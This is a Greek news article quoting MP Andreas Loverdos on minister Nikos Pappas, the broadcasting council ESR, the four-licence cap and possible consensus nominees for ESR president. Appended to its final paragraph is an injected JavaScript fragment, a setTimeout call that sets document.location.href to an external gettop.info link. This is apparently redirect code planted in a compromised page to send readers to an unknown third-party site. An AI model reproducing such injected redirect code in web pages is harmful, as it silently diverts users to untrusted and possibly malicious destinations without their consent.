Λοβέρδος: Αν δεν υπάρξει συναίνεση θα φταίει και ο Παππάς και η ΝΔ

0
32

 

«Ό,τι πάει να οικοδομηθεί με συναίνεση ο κύριος Παππάς το χαλάει. Έπρεπε να είχε ήδη παραιτηθεί και το αν δεχθεί την παραίτησή του ο πρωθυπουργός, είναι άλλο θέμα. Τον ενδιαφέρει μόνο το πολιτικό του είναι», σχολίασε ο κοινοβουλευτικός εκπρόσωπος της Δημοκρατικής Συμπαράταξης Ανδρέας Λοβέρδος μιλώντας στον ΣΚΑΙ.

«Δεν υπάρχει Υπουργός, υπάρχει ΕΣΡ και ό,τι εισηγηθεί το ΕΣΡ, ο Υπουργός είναι υποχρεωμένος να το υπογράψει, άρα ο αριθμός φεύγει από την αρμοδιότητα του Υπουργού».

«Πώς θα επιμένει στον αριθμό 4;» αναρωτήθηκε ο κ Λοβέρδος λέγοντας παράλληλα ότι ο Νίκος Παππάς θα φτιάξει δικό του ΕΣΡ, με δικούς του ανθρώπους. «Ο κ Παππάς θα έπρεπε να είχε παραιτηθεί» ανέφερε επίσης.

«Αν δεν υπάρξει συναίνεση θα φταίει και ο Παππάς και η ΝΔ που λέει να πέσει όλος ο νόμος», είπε χαρακτηριστικά ενώ τόνισε πως ο κ Βούτσης πρέπει να βοηθήσει, γιατί έχει δώσει έναn λόγο τιμής.

Ο κύριος Λοβέρδος χαρακτήρισε στολίδι τον κύριο Κουτρομάνο που πρότεινε η ΝΔ για πρόεδρο του ΕΣΡ ενώ αναφέρθηκε θετικά και για τον κύριο Σταθόπουλο που πρότεινε το Ποτάμι. Άρα είπε υπάρχουν πρόσωπα για συναίνεση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here